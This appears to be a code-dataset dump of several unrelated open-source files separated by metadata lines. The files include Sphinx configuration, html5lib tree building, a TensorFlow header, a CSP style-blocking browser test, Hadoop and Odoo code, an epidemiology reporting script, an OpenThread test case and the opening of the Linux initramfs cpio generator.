# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = True
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'
#html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
#html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'Platypus_doc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
# Latex figure (float) alignment
#'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'Platypus.tex', u'Platypus Documentation',
u'David Hadka', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'platypus', u'Platypus Documentation',
[author], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'Platypus', u'Platypus Documentation',
author, 'Platypus', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False | unknown | codeparrot/codeparrot-clean | ||
from html5lib.constants import scopingElements, tableInsertModeElements, namespaces
try:
frozenset
except NameError:
# Import from the sets module for python 2.3
from sets import Set as set
from sets import ImmutableSet as frozenset
# The scope markers are inserted when entering object elements,
# marquees, table cells, and table captions, and are used to prevent formatting
# from "leaking" into tables, object elements, and marquees.
Marker = None
class Node(object):
def __init__(self, name):
"""Node representing an item in the tree.
name - The tag name associated with the node
parent - The parent of the current node (or None for the document node)
value - The value of the current node (applies to text nodes and
comments
attributes - a dict holding name, value pairs for attributes of the node
childNodes - a list of child nodes of the current node. This must
include all elements but not necessarily other node types
_flags - A list of miscellaneous flags that can be set on the node
"""
self.name = name
self.parent = None
self.value = None
self.attributes = {}
self.childNodes = []
self._flags = []
def __unicode__(self):
attributesStr = " ".join(["%s=\"%s\""%(name, value)
for name, value in
self.attributes.iteritems()])
if attributesStr:
return "<%s %s>"%(self.name,attributesStr)
else:
return "<%s>"%(self.name)
def __repr__(self):
return "<%s>" % (self.name)
def appendChild(self, node):
"""Insert node as a child of the current node
"""
raise NotImplementedError
def insertText(self, data, insertBefore=None):
"""Insert data as text in the current node, positioned before the
start of node insertBefore or to the end of the node's text.
"""
raise NotImplementedError
def insertBefore(self, node, refNode):
"""Insert node as a child of the current node, before refNode in the
list of child nodes. Raises ValueError if refNode is not a child of
the current node"""
raise NotImplementedError
def removeChild(self, node):
"""Remove node from the children of the current node
"""
raise NotImplementedError
def reparentChildren(self, newParent):
"""Move all the children of the current node to newParent.
This is needed so that trees that don't store text as nodes move the
text in the correct way
"""
#XXX - should this method be made more general?
for child in self.childNodes:
newParent.appendChild(child)
self.childNodes = []
def cloneNode(self):
"""Return a shallow copy of the current node i.e. a node with the same
name and attributes but with no parent or child nodes
"""
raise NotImplementedError
def hasContent(self):
"""Return true if the node has children or text, false otherwise
"""
raise NotImplementedError
class ActiveFormattingElements(list):
def append(self, node):
equalCount = 0
if node != Marker:
for element in self[::-1]:
if element == Marker:
break
if self.nodesEqual(element, node):
equalCount += 1
if equalCount == 3:
self.remove(element)
break
list.append(self, node)
def nodesEqual(self, node1, node2):
if not node1.nameTuple == node2.nameTuple:
return False
if not node1.attributes == node2.attributes:
return False
return True
class TreeBuilder(object):
"""Base treebuilder implementation
documentClass - the class to use for the bottommost node of a document
elementClass - the class to use for HTML Elements
commentClass - the class to use for comments
doctypeClass - the class to use for doctypes
"""
#Document class
documentClass = None
#The class to use for creating a node
elementClass = None
#The class to use for creating comments
commentClass = None
#The class to use for creating doctypes
doctypeClass = None
#Fragment class
fragmentClass = None
def __init__(self, namespaceHTMLElements):
if namespaceHTMLElements:
self.defaultNamespace = "http://www.w3.org/1999/xhtml"
else:
self.defaultNamespace = None
self.reset()
def reset(self):
self.openElements = []
self.activeFormattingElements = ActiveFormattingElements()
#XXX - rename these to headElement, formElement
self.headPointer = None
self.formPointer = None
self.insertFromTable = False
self.document = self.documentClass()
def elementInScope(self, target, variant=None):
#If we pass a node in we match that. if we pass a string
#match any node with that name
exactNode = hasattr(target, "nameTuple")
listElementsMap = {
None:(scopingElements, False),
"button":(scopingElements | set([(namespaces["html"], "button")]), False),
"list":(scopingElements | set([(namespaces["html"], "ol"),
(namespaces["html"], "ul")]), False),
"table":(set([(namespaces["html"], "html"),
(namespaces["html"], "table")]), False),
"select":(set([(namespaces["html"], "optgroup"),
(namespaces["html"], "option")]), True)
}
listElements, invert = listElementsMap[variant]
for node in reversed(self.openElements):
if (node.name == target and not exactNode or
node == target and exactNode):
return True
elif (invert ^ (node.nameTuple in listElements)):
return False
assert False # We should never reach this point
def reconstructActiveFormattingElements(self):
# Within this algorithm the order of steps described in the
# specification is not quite the same as the order of steps in the
# code. It should still do the same though.
# Step 1: stop the algorithm when there's nothing to do.
if not self.activeFormattingElements:
return
# Step 2 and step 3: we start with the last element. So i is -1.
i = len(self.activeFormattingElements) - 1
entry = self.activeFormattingElements[i]
if entry == Marker or entry in self.openElements:
return
# Step 6
while entry != Marker and entry not in self.openElements:
if i == 0:
#This will be reset to 0 below
i = -1
break
i -= 1
# Step 5: let entry be one earlier in the list.
entry = self.activeFormattingElements[i]
while True:
# Step 7
i += 1
# Step 8
entry = self.activeFormattingElements[i]
clone = entry.cloneNode() #Mainly to get a new copy of the attributes
# Step 9
element = self.insertElement({"type":"StartTag",
"name":clone.name,
"namespace":clone.namespace,
"data":clone.attributes})
# Step 10
self.activeFormattingElements[i] = element
# Step 11
if element == self.activeFormattingElements[-1]:
break
def clearActiveFormattingElements(self):
entry = self.activeFormattingElements.pop()
while self.activeFormattingElements and entry != Marker:
entry = self.activeFormattingElements.pop()
def elementInActiveFormattingElements(self, name):
"""Check if an element exists between the end of the active
formatting elements and the last marker. If it does, return it, else
return false"""
for item in self.activeFormattingElements[::-1]:
# Check for Marker first because if it's a Marker it doesn't have a
# name attribute.
if item == Marker:
break
elif item.name == name:
return item
return False
def insertRoot(self, token):
element = self.createElement(token)
self.openElements.append(element)
self.document.appendChild(element)
def insertDoctype(self, token):
name = token["name"]
publicId = token["publicId"]
systemId = token["systemId"]
doctype = self.doctypeClass(name, publicId, systemId)
self.document.appendChild(doctype)
def insertComment(self, token, parent=None):
if parent is None:
parent = self.openElements[-1]
parent.appendChild(self.commentClass(token["data"]))
def createElement(self, token):
"""Create an element but don't insert it anywhere"""
name = token["name"]
namespace = token.get("namespace", self.defaultNamespace)
element = self.elementClass(name, namespace)
element.attributes = token["data"]
return element
def _getInsertFromTable(self):
return self._insertFromTable
def _setInsertFromTable(self, value):
"""Switch the function used to insert an element from the
normal one to the misnested table one and back again"""
self._insertFromTable = value
if value:
self.insertElement = self.insertElementTable
else:
self.insertElement = self.insertElementNormal
insertFromTable = property(_getInsertFromTable, _setInsertFromTable)
def insertElementNormal(self, token):
name = token["name"]
assert type(name) == unicode, "Element %s not unicode"%name
namespace = token.get("namespace", self.defaultNamespace)
element = self.elementClass(name, namespace)
element.attributes = token["data"]
self.openElements[-1].appendChild(element)
self.openElements.append(element)
return element
def insertElementTable(self, token):
"""Create an element and insert it into the tree"""
element = self.createElement(token)
if self.openElements[-1].name not in tableInsertModeElements:
return self.insertElementNormal(token)
else:
#We should be in the InTable mode. This means we want to do
#special magic element rearranging
parent, insertBefore = self.getTableMisnestedNodePosition()
if insertBefore is None:
parent.appendChild(element)
else:
parent.insertBefore(element, insertBefore)
self.openElements.append(element)
return element
def insertText(self, data, parent=None):
"""Insert text data."""
if parent is None:
parent = self.openElements[-1]
if (not self.insertFromTable or (self.insertFromTable and
self.openElements[-1].name
not in tableInsertModeElements)):
parent.insertText(data)
else:
# We should be in the InTable mode. This means we want to do
# special magic element rearranging
parent, insertBefore = self.getTableMisnestedNodePosition()
parent.insertText(data, insertBefore)
def getTableMisnestedNodePosition(self):
"""Get the foster parent element, and sibling to insert before
(or None) when inserting a misnested table node"""
# The foster parent element is the one which comes before the most
# recently opened table element
# XXX - this is really inelegant
lastTable=None
fosterParent = None
insertBefore = None
for elm in self.openElements[::-1]:
if elm.name == "table":
lastTable = elm
break
if lastTable:
# XXX - we should really check that this parent is actually a
# node here
if lastTable.parent:
fosterParent = lastTable.parent
insertBefore = lastTable
else:
fosterParent = self.openElements[
self.openElements.index(lastTable) - 1]
else:
fosterParent = self.openElements[0]
return fosterParent, insertBefore
def generateImpliedEndTags(self, exclude=None):
name = self.openElements[-1].name
# XXX td, th and tr are not actually needed
if (name in frozenset(("dd", "dt", "li", "option", "optgroup", "p", "rp", "rt"))
and name != exclude):
self.openElements.pop()
# XXX This is not entirely what the specification says. We should
# investigate it more closely.
self.generateImpliedEndTags(exclude)
def getDocument(self):
"Return the final tree"
return self.document
def getFragment(self):
"Return the final fragment"
#assert self.innerHTML
fragment = self.fragmentClass()
self.openElements[0].reparentChildren(fragment)
return fragment
def testSerializer(self, node):
"""Serialize the subtree of node in the format required by unit tests
node - the node from which to start serializing"""
raise NotImplementedError | unknown | codeparrot/codeparrot-clean | ||
/* Copyright 2021 The TensorFlow Authors. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
==============================================================================*/
#ifndef TENSORFLOW_C_EXPERIMENTAL_OPS_GEN_MODEL_ARG_SPEC_H_
#define TENSORFLOW_C_EXPERIMENTAL_OPS_GEN_MODEL_ARG_SPEC_H_
#include "tensorflow/c/experimental/ops/gen/model/arg_type.h"
#include "tensorflow/core/framework/op_def.pb.h"
#include "tensorflow/core/platform/types.h"
namespace tensorflow {
namespace generator {
// An input or output argument to an Op.
//
// Essentially, this represents an OpDef::ArgDef and its context within the Op.
class ArgSpec {
public:
ArgSpec() = default;
ArgSpec(const ArgSpec& other) = default;
static ArgSpec CreateInput(const OpDef::ArgDef& arg_def, int position);
static ArgSpec CreateOutput(const OpDef::ArgDef& arg_def, int position);
const std::string& name() const { return name_; }
const std::string& description() const { return description_; }
const ArgType arg_type() const { return arg_type_; }
const int position() const { return position_; }
private:
explicit ArgSpec(const OpDef::ArgDef& arg_def, ArgType arg_type,
int position);
std::string name_;
std::string description_;
ArgType arg_type_;
int position_;
};
} // namespace generator
} // namespace tensorflow
#endif // TENSORFLOW_C_EXPERIMENTAL_OPS_GEN_MODEL_ARG_SPEC_H_ | c | github | https://github.com/tensorflow/tensorflow | tensorflow/c/experimental/ops/gen/model/arg_spec.h |
def main(request, response):
import simplejson as json
f = file('config.json')
source = f.read()
s = json.JSONDecoder().decode(source)
url1 = "http://" + s['host'] + ":" + str(s['ports']['http'][1])
url2 = "http://" + s['host'] + ":" + str(s['ports']['http'][0])
_CSP = "style-src 'none'"
response.headers.set("Content-Security-Policy", _CSP)
response.headers.set("X-Content-Security-Policy", _CSP)
response.headers.set("X-WebKit-CSP", _CSP)
return """<!DOCTYPE html>
<!--
Copyright (c) 2013 Intel Corporation.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
* Redistributions of works must retain the original copyright notice, this list
of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the original copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of Intel Corporation nor the names of its contributors
may be used to endorse or promote products derived from this work without
specific prior written permission.
THIS SOFTWARE IS PROVIDED BY INTEL CORPORATION "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL INTEL CORPORATION BE LIABLE FOR ANY DIRECT,
INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY
OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
Authors:
Hao, Yunfei <yunfeix.hao@intel.com>
-->
<html>
<head>
<title>CSP Test: csp_style-src_none</title>
<link rel="author" title="Intel" href="http://www.intel.com"/>
<link rel="help" href="http://www.w3.org/TR/2012/CR-CSP-20121115/#style-src"/>
<meta name="flags" content=""/>
<meta name="assert" content="style-src 'none'"/>
<meta charset="utf-8"/>
<script src="../resources/testharness.js"></script>
<script src="../resources/testharnessreport.js"></script>
<link rel="stylesheet" type="text/css" href='""" + url1 + """/tests/csp/support/w3c/canvas-index.css'/>
<link rel="stylesheet" type="text/css" href="support/blue-100x100.css"/>
<style>
#test-green {
background-color: green;
}
</style>
</head>
<body>
<div id="log"></div>
<div id="test-blue"></div>
<div id="test-green"></div>
<h3>ext-css:""" + url1 + """/tests/csp/support/w3c/canvas-index.css</h3>
<script>
test(function() {
var div = document.querySelector("h3");
var fix = getComputedStyle(div)["display"];
assert_not_equals(fix, "inline", "style setted incorrectly");
}, document.title + "_blocked_ext");
test(function() {
var div = document.querySelector("#test-blue");
var fix = getComputedStyle(div)["backgroundColor"];
assert_not_equals(fix, "rgb(0, 0, 255)", "style setted incorrectly");
}, document.title + "_blocked_int");
test(function() {
var div = document.querySelector("#test-green");
var fix = getComputedStyle(div)["backgroundColor"];
assert_not_equals(fix, "rgb(0, 128, 0)", "style setted incorrectly");
}, document.title + "_blocked_inline");
</script>
</body>
</html> """ | unknown | codeparrot/codeparrot-clean | ||
/*
* *
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
* /
*/
package org.apache.hadoop.util.concurrent;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import java.util.concurrent.RejectedExecutionHandler;
import java.util.concurrent.ScheduledThreadPoolExecutor;
import java.util.concurrent.ThreadFactory;
/** An extension of ScheduledThreadPoolExecutor that provides additional
* functionality. */
public class HadoopScheduledThreadPoolExecutor extends
ScheduledThreadPoolExecutor {
private static final Logger LOG = LoggerFactory
.getLogger(HadoopScheduledThreadPoolExecutor.class);
public HadoopScheduledThreadPoolExecutor(int corePoolSize) {
super(corePoolSize);
}
public HadoopScheduledThreadPoolExecutor(int corePoolSize,
ThreadFactory threadFactory) {
super(corePoolSize, threadFactory);
}
public HadoopScheduledThreadPoolExecutor(int corePoolSize,
RejectedExecutionHandler handler) {
super(corePoolSize, handler);
}
public HadoopScheduledThreadPoolExecutor(int corePoolSize,
ThreadFactory threadFactory,
RejectedExecutionHandler handler) {
super(corePoolSize, threadFactory, handler);
}
@Override
protected void beforeExecute(Thread t, Runnable r) {
if (LOG.isDebugEnabled()) {
LOG.debug("beforeExecute in thread: " + Thread.currentThread()
.getName() + ", runnable type: " + r.getClass().getName());
}
}
@Override
protected void afterExecute(Runnable r, Throwable t) {
super.afterExecute(r, t);
ExecutorHelper.logThrowableFromAfterExecute(r, t);
}
} | java | github | https://github.com/apache/hadoop | hadoop-common-project/hadoop-common/src/main/java/org/apache/hadoop/util/concurrent/HadoopScheduledThreadPoolExecutor.java |
# -*- coding: utf-8 -*-
##############################################################################
#
# Author: Stéphane Bidoul
# Copyright (c) 2012 Acsone SA/NV (http://www.acsone.eu)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from . import account_analytic_project_id
from .post_install import set_account_analytic_account_project_id | unknown | codeparrot/codeparrot-clean | ||
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# vim: ai ts=4 sts=4 et sw=4 nu
from __future__ import (unicode_literals, absolute_import,
division, print_function)
import logging
import copy
import datetime
from snisi_core.models.Periods import MonthPeriod
# from snisi_core.models.ReportingPeriods import (
# DefaultMonthlyReportingPeriod, DefaultMonthlyExtendedReportingPeriod)
from snisi_core.models.Projects import Cluster
from snisi_core.models.Roles import Role
from snisi_core.models.Reporting import ExpectedReporting, ReportClass
from snisi_epidemiology import get_domain
from snisi_epidemiology.models import EpiWeekPeriod, EpiWeekReportingPeriod
logger = logging.getLogger(__name__)
DOMAIN = get_domain()
logger = logging.getLogger(__name__)
reportcls_epi = ReportClass.get_or_none(slug='epidemio_weekly_routine')
reportcls_epi_agg = ReportClass.get_or_none(
slug='epidemio_weekly_routine_aggregated')
reportcls_epi_alert = ReportClass.get_or_none(slug='epidemio_alert')
def create_expected_for(period):
logger.info("Creating ExpectedReporting for {} at {}"
.format(DOMAIN, period))
created_list = []
routine_cluster = Cluster.get_or_none("epidemiology_routine")
dtc = Role.get_or_none("dtc")
charge_sis = Role.get_or_none("charge_sis")
expected_dict = {
'period': None,
'within_period': False,
'within_entity': False,
'reporting_role': dtc,
'reporting_period': None,
'extended_reporting_period': None,
'amount_expected': ExpectedReporting.EXPECTED_SINGLE
}
# snisi_reprohealth only work with those periods
if not period.__class__ == MonthPeriod:
logger.debug("Period {} is not relevant to {}".format(period, DOMAIN))
return created_list
else:
# create expected Alerts for current month
current_month = period.following()
reporting_period = current_month
for entity in routine_cluster.members(only_active=True):
if entity.type.slug not in ('health_center', 'health_district'):
continue
edict = copy.copy(expected_dict)
edict.update({
'entity': entity,
'period': current_month,
'within_period': True,
'report_class': reportcls_epi_alert,
'reporting_role': dtc,
'reporting_period': reporting_period,
'amount_expected': ExpectedReporting.EXPECTED_ZEROPLUS
})
finddict = copy.copy(edict)
del(finddict['reporting_period'])
del(finddict['extended_reporting_period'])
e, created = ExpectedReporting.objects \
.get_or_create(**finddict)
if created:
logger.debug("Created {}".format(e))
created_list.append(e)
else:
logger.debug("Exists already: {}".format(e))
if e.reporting_period != edict['reporting_period']:
e.reporting_period = edict['reporting_period']
e.save()
if e.extended_reporting_period \
!= edict['extended_reporting_period']:
e.extended_reporting_period \
= edict['extended_reporting_period']
e.save()
if not e.completion_status:
e.completion_status = ExpectedReporting.COMPLETION_MISSING
e.save()
# Routine Weekly reports
wperiods = list(set([EpiWeekPeriod.find_create_by_date(
period.start_on + datetime.timedelta(days=d))
for d in (1, 7, 14, 21, 28)]))
for wperiod in wperiods:
logger.info("wperiod")
logger.info(wperiod)
reporting_period = EpiWeekReportingPeriod.find_create_by_date(
wperiod.middle())
for entity in routine_cluster.members(only_active=True):
# report class is based on indiv/agg
reportcls = reportcls_epi \
if entity.type.slug == 'health_center' \
else reportcls_epi_agg
reporting_role = dtc \
if entity.type.slug == 'health_center' else charge_sis
edict = copy.copy(expected_dict)
edict.update({
'entity': entity,
'period': wperiod,
'report_class': reportcls,
'reporting_role': reporting_role,
'reporting_period': reporting_period
})
finddict = copy.copy(edict)
del(finddict['reporting_period'])
del(finddict['extended_reporting_period'])
e, created = ExpectedReporting.objects \
.get_or_create(**finddict)
if created:
logger.debug("Created {}".format(e))
created_list.append(e)
else:
logger.debug("Exists already: {}".format(e))
if e.reporting_period != edict['reporting_period']:
e.reporting_period = edict['reporting_period']
e.save()
if e.extended_reporting_period \
!= edict['extended_reporting_period']:
e.extended_reporting_period \
= edict['extended_reporting_period']
e.save()
if not e.completion_status:
e.completion_status = ExpectedReporting.COMPLETION_MISSING
e.save()
return created_list
def report_classes_for(cluster):
return [reportcls_epi, reportcls_epi_agg] | unknown | codeparrot/codeparrot-clean | ||
#!/usr/bin/env python
#
# Copyright (c) 2016, The OpenThread Authors.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
import unittest
from autothreadharness.harness_case import HarnessCase
class Leader_5_6_6(HarnessCase):
role = HarnessCase.ROLE_LEADER
case = '5 6 6'
golden_devices_required = 3
def on_dialog(self, dialog, title):
pass
if __name__ == '__main__':
unittest.main() | unknown | codeparrot/codeparrot-clean | ||
// SPDX-License-Identifier: GPL-2.0
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <stdbool.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <string.h>
#include <unistd.h>
#include <time.h>
#include <fcntl.h>
#include <errno.h>
#include <ctype.h>
#include <limits.h>
/*
* Original work by Jeff Garzik
*
* External file lists, symlink, pipe and fifo support by Thayne Harbaugh
* Hard link support by Luciano Rocha
*/
#define xstr(s) #s
#define str(s) xstr(s)
#define MIN(a, b) ((a) < (b) ? (a) : (b))
#define CPIO_HDR_LEN 110
#define CPIO_TRAILER "TRAILER!!!"
#define padlen(_off, _align) (((_align) - ((_off) & ((_align) - 1))) % (_align))
/* zero-padding the filename field for data alignment is limited by PATH_MAX */
static char padding[PATH_MAX];
static unsigned int offset;
static unsigned int ino = 721;
static time_t default_mtime;
static bool do_file_mtime;
static bool do_csum = false;
static int outfd = STDOUT_FILENO;
static unsigned int dalign;
struct file_handler {
const char *type;
int (*handler)(const char *line);
};
static int push_buf(const char *name, size_t name_len)
{
ssize_t len;
len = write(outfd, name, name_len);
if (len != name_len)
return -1;
offset += name_len;
return 0;
}
static int push_pad(size_t padlen)
{
ssize_t len = 0;
if (!padlen)
return 0;
if (padlen < sizeof(padding))
len = write(outfd, padding, padlen);
if (len != padlen)
return -1;
offset += padlen;
return 0;
}
static int push_rest(const char *name, size_t name_len)
{
ssize_t len;
len = write(outfd, name, name_len);
if (len != name_len)
return -1;
offset += name_len;
return push_pad(padlen(name_len + CPIO_HDR_LEN, 4));
}
static int cpio_trailer(void)
{
int len;
unsigned int namesize = sizeof(CPIO_TRAILER);
len = dprintf(outfd, "%s%08X%08X%08lX%08lX%08X%08lX"
"%08X%08X%08X%08X%08X%08X%08X",
do_csum ? "070702" : "070701", /* magic */
0, /* ino */
0, /* mode */
(long) 0, /* uid */
(long) 0, /* gid */
1, /* nlink */
(long) 0, /* mtime */
0, /* filesize */
0, /* major */
0, /* minor */
0, /* rmajor */
0, /* rminor */
namesize, /* namesize */
0); /* chksum */
offset += len;
if (len != CPIO_HDR_LEN ||
push_rest(CPIO_TRAILER, namesize) < 0 ||
push_pad(padlen(offset, 512)) < 0)
return -1;
if (fsync(outfd) < 0 && errno != EINVAL)
return -1;
return 0;
}
static int cpio_mkslink(const char *name, const char *target,
unsigned int mode, uid_t uid, gid_t gid)
{
int len;
unsigned int namesize, targetsize = strlen(target) + 1;
if (name[0] == '/')
name++;
namesize = strlen(name) + 1;
len = dprintf(outfd, "%s%08X%08X%08lX%08lX%08X%08lX"
"%08X%08X%08X%08X%08X%08X%08X",
do_csum ? "070702" : "070701", /* magic */
ino++, /* ino */
S_IFLNK | mode, /* mode */
(long) uid, /* uid */
(long) gid, /* gid */
1, /* nlink */
(long) default_mtime, /* mtime */
targetsize, /* filesize */
3, /* major */
1, /* minor */
0, /* rmajor */
0, /* rminor */
namesize, /* namesize */
0); /* chksum */
offset += len;
if (len != CPIO_HDR_LEN ||
push_buf(name, namesize) < 0 ||
push_pad(padlen(offset, 4)) < 0 ||
push_buf(target, targetsize) < 0 ||
push_pad(padlen(offset, 4)) < 0)
return -1;
return 0;
}
static int cpio_mkslink_line(const char *line)
{
char name[PATH_MAX + 1];
char target[PATH_MAX + 1];
